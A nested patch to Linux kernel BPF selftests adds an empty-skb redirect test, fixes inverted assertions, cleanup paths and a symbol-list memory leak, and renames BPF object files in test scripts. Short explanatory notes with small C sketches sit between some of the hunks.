+ 	if (!ASSERT_OK(err, "mount /sys/fs/bpf"))
+ 		return err;
+ 
++	err = mount("debugfs", "/sys/kernel/debug", "debugfs", 0, NULL);
++	if (!ASSERT_OK(err, "mount /sys/kernel/debug"))
++		return err;
++
+ 	return 0;
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+index 3369c5ec3a17c..ecde236047fe1 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
++++ b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+@@ -1498,7 +1498,6 @@ static noinline int trigger_func(int arg)
+ static void test_task_vma_offset_common(struct bpf_iter_attach_opts *opts, bool one_proc)
+ {
+ 	struct bpf_iter_vma_offset *skel;
+-	struct bpf_link *link;
+ 	char buf[16] = {};
+ 	int iter_fd, len;
+ 	int pgsz, shift;
+@@ -1513,11 +1512,11 @@ static void test_task_vma_offset_common(struct bpf_iter_attach_opts *opts, bool
+ 		;
+ 	skel->bss->page_shift = shift;
+ 
+-	link = bpf_program__attach_iter(skel->progs.get_vma_offset, opts);
+-	if (!ASSERT_OK_PTR(link, "attach_iter"))
+-		return;
++	skel->links.get_vma_offset = bpf_program__attach_iter(skel->progs.get_vma_offset, opts);
++	if (!ASSERT_OK_PTR(skel->links.get_vma_offset, "attach_iter"))
++		goto exit;
+ 
+-	iter_fd = bpf_iter_create(bpf_link__fd(link));
++	iter_fd = bpf_iter_create(bpf_link__fd(skel->links.get_vma_offset));
+ 	if (!ASSERT_GT(iter_fd, 0, "create_iter"))
+ 		goto exit;
+ 
+@@ -1535,7 +1534,7 @@ static void test_task_vma_offset_common(struct bpf_iter_attach_opts *opts, bool
+ 	close(iter_fd);
+ 
+ exit:
+-	bpf_link__destroy(link);
++	bpf_iter_vma_offset__destroy(skel);
+ }
+ 
+ static void test_task_vma_offset(void)
+diff --git a/tools/testing/selftests/bpf/prog_tests/empty_skb.c b/tools/testing/selftests/bpf/prog_tests/empty_skb.c
+new file mode 100644
+index 0000000000000..0613f3bb8b5e4
+--- /dev/null
++++ b/tools/testing/selftests/bpf/prog_tests/empty_skb.c
+@@ -0,0 +1,146 @@
++// SPDX-License-Identifier: GPL-2.0
++#include <test_progs.h>
++#include <network_helpers.h>
++#include <net/if.h>
++#include "empty_skb.skel.h"
++
++#define SYS(cmd) ({ \
++	if (!ASSERT_OK(system(cmd), (cmd))) \
++		goto out; \
++})
++
++void serial_test_empty_skb(void)
++{
++	LIBBPF_OPTS(bpf_test_run_opts, tattr);
++	struct empty_skb *bpf_obj = NULL;
++	struct nstoken *tok = NULL;
++	struct bpf_program *prog;
++	char eth_hlen_pp[15];
++	char eth_hlen[14];
++	int veth_ifindex;
++	int ipip_ifindex;
++	int err;
++	int i;
++
++	struct {
++		const char *msg;
++		const void *data_in;
++		__u32 data_size_in;
++		int *ifindex;
++		int err;
++		int ret;
++		bool success_on_tc;
++	} tests[] = {
++		/* Empty packets are always rejected. */
++
++		{
++			/* BPF_PROG_RUN ETH_HLEN size check */
++			.msg = "veth empty ingress packet",
++			.data_in = NULL,
++			.data_size_in = 0,
++			.ifindex = &veth_ifindex,
++			.err = -EINVAL,
++		},
++		{
++			/* BPF_PROG_RUN ETH_HLEN size check */
++			.msg = "ipip empty ingress packet",
++			.data_in = NULL,
++			.data_size_in = 0,
++			.ifindex = &ipip_ifindex,
++			.err = -EINVAL,
++		},
++
++		/* ETH_HLEN-sized packets:
++		 * - can not be redirected at LWT_XMIT
++		 * - can be redirected at TC to non-tunneling dest
++		 */
++
++		{
++			/* __bpf_redirect_common */
++			.msg = "veth ETH_HLEN packet ingress",
++			.data_in = eth_hlen,
++			.data_size_in = sizeof(eth_hlen),
++			.ifindex = &veth_ifindex,
++			.ret = -ERANGE,
++			.success_on_tc = true,
++		},
++		{
++			/* __bpf_redirect_no_mac
++			 *
++			 * lwt: skb->len=0 <= skb_network_offset=0
++			 * tc: skb->len=14 <= skb_network_offset=14
++			 */
++			.msg = "ipip ETH_HLEN packet ingress",
++			.data_in = eth_hlen,
++			.data_size_in = sizeof(eth_hlen),
++			.ifindex = &ipip_ifindex,
++			.ret = -ERANGE,
++		},
++
++		/* ETH_HLEN+1-sized packet should be redirected. */
++
++		{
++			.msg = "veth ETH_HLEN+1 packet ingress",
++			.data_in = eth_hlen_pp,
++			.data_size_in = sizeof(eth_hlen_pp),
++			.ifindex = &veth_ifindex,
++		},
++		{
++			.msg = "ipip ETH_HLEN+1 packet ingress",
++			.data_in = eth_hlen_pp,
++			.data_size_in = sizeof(eth_hlen_pp),
++			.ifindex = &ipip_ifindex,
++		},
++	};
++
++	SYS("ip netns add empty_skb");
++	tok = open_netns("empty_skb");
++	SYS("ip link add veth0 type veth peer veth1");
++	SYS("ip link set dev veth0 up");
++	SYS("ip link set dev veth1 up");
++	SYS("ip addr add 10.0.0.1/8 dev veth0");
++	SYS("ip addr add 10.0.0.2/8 dev veth1");
++	veth_ifindex = if_nametoindex("veth0");
++
++	SYS("ip link add ipip0 type ipip local 10.0.0.1 remote 10.0.0.2");
++	SYS("ip link set ipip0 up");
++	SYS("ip addr add 192.168.1.1/16 dev ipip0");
++	ipip_ifindex = if_nametoindex("ipip0");
++
++	bpf_obj = empty_skb__open_and_load();
++	if (!ASSERT_OK_PTR(bpf_obj, "open skeleton"))
++		goto out;
++
++	for (i = 0; i < ARRAY_SIZE(tests); i++) {
++		bpf_object__for_each_program(prog, bpf_obj->obj) {
++			char buf[128];
++			bool at_tc = !strncmp(bpf_program__section_name(prog), "tc", 2);
++
++			tattr.data_in = tests[i].data_in;
++			tattr.data_size_in = tests[i].data_size_in;
++
++			tattr.data_size_out = 0;
++			bpf_obj->bss->ifindex = *tests[i].ifindex;
++			bpf_obj->bss->ret = 0;
++			err = bpf_prog_test_run_opts(bpf_program__fd(prog), &tattr);
++			sprintf(buf, "err: %s [%s]", tests[i].msg, bpf_program__name(prog));
++
++			if (at_tc && tests[i].success_on_tc)
++				ASSERT_GE(err, 0, buf);
++			else
++				ASSERT_EQ(err, tests[i].err, buf);
++			sprintf(buf, "ret: %s [%s]", tests[i].msg, bpf_program__name(prog));
++			if (at_tc && tests[i].success_on_tc)
++				ASSERT_GE(bpf_obj->bss->ret, 0, buf);
++			else
++				ASSERT_EQ(bpf_obj->bss->ret, tests[i].ret, buf);
++		}
++	}
++
++out:
++	if (bpf_obj)
++		empty_skb__destroy(bpf_obj);
++	if (tok)
++		close_netns(tok);
++	system("ip netns del empty_skb");
++}
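
The new empty_skb test drives its netns setup through the SYS() macro defined at the top of the file: a GNU statement expression that runs a shell command and jumps to the shared "out:" cleanup label on failure. A freestanding sketch of the same shape, with fprintf standing in for the harness's ASSERT_OK:

#include <stdio.h>
#include <stdlib.h>

/* GNU statement-expression macro: on failure, report and jump to the
 * caller's local "out:" cleanup label. */
#define SYS(cmd) ({                                 \
	if (system(cmd) != 0) {                     \
		fprintf(stderr, "FAIL: %s\n", cmd); \
		goto out;                           \
	}                                           \
})

int main(void)
{
	SYS("true");            /* succeeds, execution continues */
	SYS("false");           /* fails, jumps to cleanup below */
	puts("not reached");
out:
	puts("cleanup");        /* teardown runs on success and failure */
	return 0;
}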
+diff --git a/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c b/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c
+index a4b4133d39e95..0d82e28aed1ac 100644
+--- a/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c
++++ b/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c
+@@ -325,7 +325,7 @@ static bool symbol_equal(const void *key1, const void *key2, void *ctx __maybe_u
+ static int get_syms(char ***symsp, size_t *cntp)
+ {
+ 	size_t cap = 0, cnt = 0, i;
+-	char *name, **syms = NULL;
++	char *name = NULL, **syms = NULL;
+ 	struct hashmap *map;
+ 	char buf[256];
+ 	FILE *f;
+@@ -352,6 +352,8 @@ static int get_syms(char ***symsp, size_t *cntp)
+ 		/* skip modules */
+ 		if (strchr(buf, '['))
+ 			continue;
++
++		free(name);
+ 		if (sscanf(buf, "%ms$*[^\n]\n", &name) != 1)
+ 			continue;
+ 		/*
+@@ -371,32 +373,32 @@ static int get_syms(char ***symsp, size_t *cntp)
+ 		if (!strncmp(name, "__ftrace_invalid_address__",
+ 			     sizeof("__ftrace_invalid_address__") - 1))
+ 			continue;
++
+ 		err = hashmap__add(map, name, NULL);
+-		if (err) {
+-			free(name);
+-			if (err == -EEXIST)
+-				continue;
++		if (err == -EEXIST)
++			continue;
++		if (err)
+ 			goto error;
+-		}
++
+ 		err = libbpf_ensure_mem((void **) &syms, &cap,
+ 					sizeof(*syms), cnt + 1);
+-		if (err) {
+-			free(name);
++		if (err)
+ 			goto error;
+-		}
+-		syms[cnt] = name;
+-		cnt++;
++
++		syms[cnt++] = name;
++		name = NULL;
+ 	}
+ 
+ 	*symsp = syms;
+ 	*cntp = cnt;
+ 
+ error:
++	free(name);
+ 	fclose(f);
+ 	hashmap__free(map);
+ 	if (err) {
+ 		for (i = 0; i < cnt; i++)
+-			free(syms[cnt]);
++			free(syms[i]);
+ 		free(syms);
+ 	}
+ 	return err;
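
The error path above iterated i but freed syms[cnt] on every pass; since libbpf_ensure_mem() zero-fills grown memory, that one-past-last slot is likely NULL, so the loop freed nothing and leaked every string. The fix frees syms[i]. A tiny sketch of the corrected teardown:

#include <stdlib.h>
#include <string.h>

static void free_syms(char **syms, size_t cnt)
{
	size_t i;

	for (i = 0; i < cnt; i++)
		free(syms[i]);   /* was free(syms[cnt]): same slot each pass */
	free(syms);
}

int main(void)
{
	char **syms = calloc(2, sizeof(*syms));

	if (!syms)
		return 1;
	syms[0] = strdup("vfs_read");
	syms[1] = strdup("vfs_write");
	free_syms(syms, 2);
	return 0;
}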
+diff --git a/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c b/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c
+index 1102e4f42d2d4..f117bfef68a14 100644
+--- a/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c
++++ b/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c
+@@ -173,10 +173,12 @@ static void test_lsm_cgroup_functional(void)
+ 	ASSERT_EQ(query_prog_cnt(cgroup_fd, NULL), 4, "total prog count");
+ 	ASSERT_EQ(query_prog_cnt(cgroup_fd2, NULL), 1, "total prog count");
+ 
+-	/* AF_UNIX is prohibited. */
+-
+ 	fd = socket(AF_UNIX, SOCK_STREAM, 0);
+-	ASSERT_LT(fd, 0, "socket(AF_UNIX)");
++	if (!(skel->kconfig->CONFIG_SECURITY_APPARMOR
++	    || skel->kconfig->CONFIG_SECURITY_SELINUX
++	    || skel->kconfig->CONFIG_SECURITY_SMACK))
++		/* AF_UNIX is prohibited. */
++		ASSERT_LT(fd, 0, "socket(AF_UNIX)");
+ 	close(fd);
+ 
+ 	/* AF_INET6 gets default policy (sk_priority). */
+@@ -233,11 +235,18 @@ static void test_lsm_cgroup_functional(void)
+ 
+ 	/* AF_INET6+SOCK_STREAM
+ 	 * AF_PACKET+SOCK_RAW
++	 * AF_UNIX+SOCK_RAW if non-bpf LSMs are already installed
+ 	 * listen_fd
+ 	 * client_fd
+ 	 * accepted_fd
+ 	 */
+-	ASSERT_EQ(skel->bss->called_socket_post_create2, 5, "called_create2");
++	if (skel->kconfig->CONFIG_SECURITY_APPARMOR
++	    || skel->kconfig->CONFIG_SECURITY_SELINUX
++	    || skel->kconfig->CONFIG_SECURITY_SMACK)
++		/* AF_UNIX+SOCK_RAW if non-bpf LSMs are already installed */
++		ASSERT_EQ(skel->bss->called_socket_post_create2, 6, "called_create2");
++	else
++		ASSERT_EQ(skel->bss->called_socket_post_create2, 5, "called_create2");
+ 
+ 	/* start_server
+ 	 * bind(ETH_P_ALL)
+diff --git a/tools/testing/selftests/bpf/prog_tests/map_kptr.c b/tools/testing/selftests/bpf/prog_tests/map_kptr.c
+index fdcea7a61491e..0d66b15242089 100644
+--- a/tools/testing/selftests/bpf/prog_tests/map_kptr.c
++++ b/tools/testing/selftests/bpf/prog_tests/map_kptr.c
+@@ -105,7 +105,7 @@ static void test_map_kptr_success(bool test_run)
+ 	ASSERT_OK(opts.retval, "test_map_kptr_ref2 retval");
+ 
+ 	if (test_run)
+-		return;
++		goto exit;
+ 
+ 	ret = bpf_map__update_elem(skel->maps.array_map,
+ 				   &key, sizeof(key), buf, sizeof(buf), 0);
+@@ -132,6 +132,7 @@ static void test_map_kptr_success(bool test_run)
+ 	ret = bpf_map__delete_elem(skel->maps.lru_hash_map, &key, sizeof(key), 0);
+ 	ASSERT_OK(ret, "lru_hash_map delete");
+ 
++exit:
+ 	map_kptr__destroy(skel);
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c b/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c
+index 617bbce6ef8f1..57191773572a0 100644
+--- a/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c
++++ b/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c
+@@ -485,7 +485,7 @@ static void misc(void)
+ 			goto check_linum;
+ 
+ 		ret = read(sk_fds.passive_fd, recv_msg, sizeof(recv_msg));
+-		if (ASSERT_EQ(ret, sizeof(send_msg), "read(msg)"))
++		if (!ASSERT_EQ(ret, sizeof(send_msg), "read(msg)"))
+ 			goto check_linum;
+ 	}
+ 
+@@ -539,7 +539,7 @@ void test_tcp_hdr_options(void)
+ 		goto skel_destroy;
+ 
+ 	cg_fd = test__join_cgroup(CG_NAME);
+-	if (ASSERT_GE(cg_fd, 0, "join_cgroup"))
++	if (!ASSERT_GE(cg_fd, 0, "join_cgroup"))
+ 		goto skel_destroy;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(tests); i++) {
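
Several selftest hunks here (tcp_hdr_options above, tracing_struct and xdp_adjust_tail below) fix inverted checks: the ASSERT_* helpers return true when the condition holds, so error handling must branch on the negation; "if (ASSERT_OK(err, ...))" bails out on success and sails past failures. A stand-in helper makes the shape concrete:

#include <stdio.h>

/* Stand-in for the selftest helper: returns nonzero when the value is
 * OK (zero), and prints a failure message otherwise. */
static int assert_ok(long err, const char *name)
{
	if (err)
		fprintf(stderr, "FAIL: %s (err=%ld)\n", name, err);
	return err == 0;
}

int main(void)
{
	long err = -22;

	if (!assert_ok(err, "prog_load"))  /* correct: taken on failure */
		return 1;
	return 0;
}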
+diff --git a/tools/testing/selftests/bpf/prog_tests/tracing_struct.c b/tools/testing/selftests/bpf/prog_tests/tracing_struct.c
+index d5022b91d1e4c..48dc9472e160a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/tracing_struct.c
++++ b/tools/testing/selftests/bpf/prog_tests/tracing_struct.c
+@@ -15,7 +15,7 @@ static void test_fentry(void)
+ 
+ 	err = tracing_struct__attach(skel);
+ 	if (!ASSERT_OK(err, "tracing_struct__attach"))
+-		return;
++		goto destroy_skel;
+ 
+ 	ASSERT_OK(trigger_module_test_read(256), "trigger_read");
+ 
+@@ -54,6 +54,7 @@ static void test_fentry(void)
+ 	ASSERT_EQ(skel->bss->t5_ret, 1, "t5 ret");
+ 
+ 	tracing_struct__detach(skel);
++destroy_skel:
+ 	tracing_struct__destroy(skel);
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+index 9b9cf8458adf8..39973ea1ce433 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+@@ -18,7 +18,7 @@ static void test_xdp_adjust_tail_shrink(void)
+ 	);
+ 
+ 	err = bpf_prog_test_load(file, BPF_PROG_TYPE_XDP, &obj, &prog_fd);
+-	if (ASSERT_OK(err, "test_xdp_adjust_tail_shrink"))
++	if (!ASSERT_OK(err, "test_xdp_adjust_tail_shrink"))
+ 		return;
+ 
+ 	err = bpf_prog_test_run_opts(prog_fd, &topts);
+@@ -53,7 +53,7 @@ static void test_xdp_adjust_tail_grow(void)
+ 	);
+ 
+ 	err = bpf_prog_test_load(file, BPF_PROG_TYPE_XDP, &obj, &prog_fd);
+-	if (ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
++	if (!ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
+ 		return;
+ 
+ 	err = bpf_prog_test_run_opts(prog_fd, &topts);
+@@ -63,6 +63,7 @@ static void test_xdp_adjust_tail_grow(void)
+ 	expect_sz = sizeof(pkt_v6) + 40; /* Test grow with 40 bytes */
+ 	topts.data_in = &pkt_v6;
+ 	topts.data_size_in = sizeof(pkt_v6);
++	topts.data_size_out = sizeof(buf);
+ 	err = bpf_prog_test_run_opts(prog_fd, &topts);
+ 	ASSERT_OK(err, "ipv6");
+ 	ASSERT_EQ(topts.retval, XDP_TX, "ipv6 retval");
+@@ -89,7 +90,7 @@ static void test_xdp_adjust_tail_grow2(void)
+ 	);
+ 
+ 	err = bpf_prog_test_load(file, BPF_PROG_TYPE_XDP, &obj, &prog_fd);
+-	if (ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
++	if (!ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
+ 		return;
+ 
+ 	/* Test case-64 */
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+index a50971c6cf4a5..9ac6f6a268db2 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+@@ -85,7 +85,7 @@ static void test_max_pkt_size(int fd)
+ }
+ 
+ #define NUM_PKTS 10000
+-void test_xdp_do_redirect(void)
++void serial_test_xdp_do_redirect(void)
+ {
+ 	int err, xdp_prog_fd, tc_prog_fd, ifindex_src, ifindex_dst;
+ 	char data[sizeof(pkt_udp) + sizeof(__u32)];
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c b/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c
+index 75550a40e029d..879f5da2f21e6 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_synproxy.c
+@@ -174,7 +174,7 @@ out:
+ 	system("ip netns del synproxy");
+ }
+ 
+-void test_xdp_synproxy(void)
++void serial_test_xdp_synproxy(void)
+ {
+ 	if (test__start_subtest("xdp"))
+ 		test_synproxy(true);
+diff --git a/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c b/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c
+index 285c008cbf9c2..9ba14c37bbcc9 100644
+--- a/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c
++++ b/tools/testing/selftests/bpf/progs/bpf_iter_ksym.c
+@@ -7,14 +7,14 @@ char _license[] SEC("license") = "GPL";
+ 
+ unsigned long last_sym_value = 0;
+ 
+-static inline char tolower(char c)
++static inline char to_lower(char c)
+ {
+ 	if (c >= 'A' && c <= 'Z')
+ 		c += ('a' - 'A');
+ 	return c;
+ }
+ 
+-static inline char toupper(char c)
++static inline char to_upper(char c)
+ {
+ 	if (c >= 'a' && c <= 'z')
+ 		c -= ('a' - 'A');
+@@ -54,7 +54,7 @@ int dump_ksym(struct bpf_iter__ksym *ctx)
+ 	type = iter->type;
+ 
+ 	if (iter->module_name[0]) {
+-		type = iter->exported ? toupper(type) : tolower(type);
++		type = iter->exported ? to_upper(type) : to_lower(type);
+ 		BPF_SEQ_PRINTF(seq, "0x%llx %c %s [ %s ] ",
+ 			       value, type, iter->name, iter->module_name);
+ 	} else {
+diff --git a/tools/testing/selftests/bpf/progs/empty_skb.c b/tools/testing/selftests/bpf/progs/empty_skb.c
+new file mode 100644
+index 0000000000000..4b0cd67532511
+--- /dev/null
++++ b/tools/testing/selftests/bpf/progs/empty_skb.c
+@@ -0,0 +1,37 @@
++// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
++#include <linux/bpf.h>
++#include <bpf/bpf_helpers.h>
++#include <bpf/bpf_endian.h>
++
++char _license[] SEC("license") = "GPL";
++
++int ifindex;
++int ret;
++
++SEC("lwt_xmit")
++int redirect_ingress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, BPF_F_INGRESS);
++	return 0;
++}
++
++SEC("lwt_xmit")
++int redirect_egress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, 0);
++	return 0;
++}
++
++SEC("tc")
++int tc_redirect_ingress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, BPF_F_INGRESS);
++	return 0;
++}
++
++SEC("tc")
++int tc_redirect_egress(struct __sk_buff *skb)
++{
++	ret = bpf_clone_redirect(skb, ifindex, 0);
++	return 0;
++}
+diff --git a/tools/testing/selftests/bpf/progs/lsm_cgroup.c b/tools/testing/selftests/bpf/progs/lsm_cgroup.c
+index 4f2d60b87b75d..02c11d16b692a 100644
+--- a/tools/testing/selftests/bpf/progs/lsm_cgroup.c
++++ b/tools/testing/selftests/bpf/progs/lsm_cgroup.c
+@@ -7,6 +7,10 @@
+ 
+ char _license[] SEC("license") = "GPL";
+ 
++extern bool CONFIG_SECURITY_SELINUX __kconfig __weak;
++extern bool CONFIG_SECURITY_SMACK __kconfig __weak;
++extern bool CONFIG_SECURITY_APPARMOR __kconfig __weak;
++
+ #ifndef AF_PACKET
+ #define AF_PACKET 17
+ #endif
+@@ -140,6 +144,10 @@ SEC("lsm_cgroup/sk_alloc_security")
+ int BPF_PROG(socket_alloc, struct sock *sk, int family, gfp_t priority)
+ {
+ 	called_socket_alloc++;
++	/* if non-bpf LSMs are already installed, returning EPERM here would leak their allocations */
++	if (CONFIG_SECURITY_SELINUX || CONFIG_SECURITY_SMACK || CONFIG_SECURITY_APPARMOR)
++		return 1;
++
+ 	if (family == AF_UNIX)
+ 		return 0; /* EPERM */
+ 
+diff --git a/tools/testing/selftests/bpf/test_bpftool_metadata.sh b/tools/testing/selftests/bpf/test_bpftool_metadata.sh
+index 1bf81b49457af..b5520692f41bd 100755
+--- a/tools/testing/selftests/bpf/test_bpftool_metadata.sh
++++ b/tools/testing/selftests/bpf/test_bpftool_metadata.sh
+@@ -4,6 +4,9 @@
+ # Kselftest framework requirement - SKIP code is 4.
+ ksft_skip=4
+ 
++BPF_FILE_USED="metadata_used.bpf.o"
++BPF_FILE_UNUSED="metadata_unused.bpf.o"
++
+ TESTNAME=bpftool_metadata
+ BPF_FS=$(awk '$3 == "bpf" {print $2; exit}' /proc/mounts)
+ BPF_DIR=$BPF_FS/test_$TESTNAME
+@@ -55,7 +58,7 @@ mkdir $BPF_DIR
+ 
+ trap cleanup EXIT
+ 
+-bpftool prog load metadata_unused.o $BPF_DIR/unused
++bpftool prog load $BPF_FILE_UNUSED $BPF_DIR/unused
+ 
+ METADATA_PLAIN="$(bpftool prog)"
+ echo "$METADATA_PLAIN" | grep 'a = "foo"' > /dev/null
+@@ -67,7 +70,7 @@ bpftool map | grep 'metadata.rodata' > /dev/null
+ 
+ rm $BPF_DIR/unused
+ 
+-bpftool prog load metadata_used.o $BPF_DIR/used
++bpftool prog load $BPF_FILE_USED $BPF_DIR/used
+ 
+ METADATA_PLAIN="$(bpftool prog)"
+ echo "$METADATA_PLAIN" | grep 'a = "bar"' > /dev/null
+diff --git a/tools/testing/selftests/bpf/test_flow_dissector.sh b/tools/testing/selftests/bpf/test_flow_dissector.sh
+index 5303ce0c977bd..4b298863797a2 100755
+--- a/tools/testing/selftests/bpf/test_flow_dissector.sh
++++ b/tools/testing/selftests/bpf/test_flow_dissector.sh
+@@ -2,6 +2,8 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+ # Load BPF flow dissector and verify it correctly dissects traffic
++
++BPF_FILE="bpf_flow.bpf.o"
+ export TESTNAME=test_flow_dissector
+ unmount=0
+ 
+@@ -22,7 +24,7 @@ if [[ -z $(ip netns identify $$) ]]; then
+ 	if bpftool="$(which bpftool)"; then
+ 		echo "Testing global flow dissector..."
+ 
+-		$bpftool prog loadall ./bpf_flow.o /sys/fs/bpf/flow \
++		$bpftool prog loadall $BPF_FILE /sys/fs/bpf/flow \
+ 			type flow_dissector
+ 
+ 		if ! unshare --net $bpftool prog attach pinned \
+@@ -95,7 +97,7 @@ else
+ fi
+ 
+ # Attach BPF program
+-./flow_dissector_load -p bpf_flow.o -s _dissect
++./flow_dissector_load -p $BPF_FILE -s _dissect
+ 
+ # Setup
+ tc qdisc add dev lo ingress
+diff --git a/tools/testing/selftests/bpf/test_lwt_ip_encap.sh b/tools/testing/selftests/bpf/test_lwt_ip_encap.sh
+index 6c69c42b1d607..1e565f47aca94 100755
+--- a/tools/testing/selftests/bpf/test_lwt_ip_encap.sh
++++ b/tools/testing/selftests/bpf/test_lwt_ip_encap.sh
+@@ -38,6 +38,7 @@
+ #       ping: SRC->[encap at veth2:ingress]->GRE:decap->DST
+ #       ping replies go DST->SRC directly
+ 
++BPF_FILE="test_lwt_ip_encap.bpf.o"
+ if [[ $EUID -ne 0 ]]; then
+ 	echo "This script must be run as root"
+ 	echo "FAIL"
+@@ -373,14 +374,14 @@ test_egress()
+ 	# install replacement routes (LWT/eBPF), pings succeed
+ 	if [ "${ENCAP}" == "IPv4" ] ; then
+ 		ip -netns ${NS1} route add ${IPv4_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth1 ${VRF}
+ 		ip -netns ${NS1} -6 route add ${IPv6_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth1 ${VRF}
+ 	elif [ "${ENCAP}" == "IPv6" ] ; then
+ 		ip -netns ${NS1} route add ${IPv4_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth1 ${VRF}
+ 		ip -netns ${NS1} -6 route add ${IPv6_DST} encap bpf xmit obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth1 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth1 ${VRF}
+ 	else
+ 		echo "    unknown encap ${ENCAP}"
+ 		TEST_STATUS=1
+@@ -431,14 +432,14 @@ test_ingress()
+ 	# install replacement routes (LWT/eBPF), pings succeed
+ 	if [ "${ENCAP}" == "IPv4" ] ; then
+ 		ip -netns ${NS2} route add ${IPv4_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth2 ${VRF}
+ 		ip -netns ${NS2} -6 route add ${IPv6_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre dev veth2 ${VRF}
+ 	elif [ "${ENCAP}" == "IPv6" ] ; then
+ 		ip -netns ${NS2} route add ${IPv4_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth2 ${VRF}
+ 		ip -netns ${NS2} -6 route add ${IPv6_DST} encap bpf in obj \
+-			test_lwt_ip_encap.o sec encap_gre6 dev veth2 ${VRF}
++			${BPF_FILE} sec encap_gre6 dev veth2 ${VRF}
+ 	else
+ 		echo "FAIL: unknown encap ${ENCAP}"
+ 		TEST_STATUS=1
+diff --git a/tools/testing/selftests/bpf/test_lwt_seg6local.sh b/tools/testing/selftests/bpf/test_lwt_seg6local.sh
+index 826f4423ce029..0efea2292d6aa 100755
+--- a/tools/testing/selftests/bpf/test_lwt_seg6local.sh
++++ b/tools/testing/selftests/bpf/test_lwt_seg6local.sh
+@@ -23,6 +23,7 @@
+ 
+ # Kselftest framework requirement - SKIP code is 4.
+ ksft_skip=4
++BPF_FILE="test_lwt_seg6local.bpf.o"
+ readonly NS1="ns1-$(mktemp -u XXXXXX)"
+ readonly NS2="ns2-$(mktemp -u XXXXXX)"
+ readonly NS3="ns3-$(mktemp -u XXXXXX)"
+@@ -117,18 +118,18 @@ ip netns exec ${NS6} ip -6 addr add fb00::109/16 dev veth10 scope link
+ ip netns exec ${NS1} ip -6 addr add fb00::1/16 dev lo
+ ip netns exec ${NS1} ip -6 route add fb00::6 dev veth1 via fb00::21
+ 
+-ip netns exec ${NS2} ip -6 route add fb00::6 encap bpf in obj test_lwt_seg6local.o sec encap_srh dev veth2
++ip netns exec ${NS2} ip -6 route add fb00::6 encap bpf in obj ${BPF_FILE} sec encap_srh dev veth2
+ ip netns exec ${NS2} ip -6 route add fd00::1 dev veth3 via fb00::43 scope link
+ 
+ ip netns exec ${NS3} ip -6 route add fc42::1 dev veth5 via fb00::65
+-ip netns exec ${NS3} ip -6 route add fd00::1 encap seg6local action End.BPF endpoint obj test_lwt_seg6local.o sec add_egr_x dev veth4
++ip netns exec ${NS3} ip -6 route add fd00::1 encap seg6local action End.BPF endpoint obj ${BPF_FILE} sec add_egr_x dev veth4
+ 
+-ip netns exec ${NS4} ip -6 route add fd00::2 encap seg6local action End.BPF endpoint obj test_lwt_seg6local.o sec pop_egr dev veth6
++ip netns exec ${NS4} ip -6 route add fd00::2 encap seg6local action End.BPF endpoint obj ${BPF_FILE} sec pop_egr dev veth6
+ ip netns exec ${NS4} ip -6 addr add fc42::1 dev lo
+ ip netns exec ${NS4} ip -6 route add fd00::3 dev veth7 via fb00::87
+ 
+ ip netns exec ${NS5} ip -6 route add fd00::4 table 117 dev veth9 via fb00::109
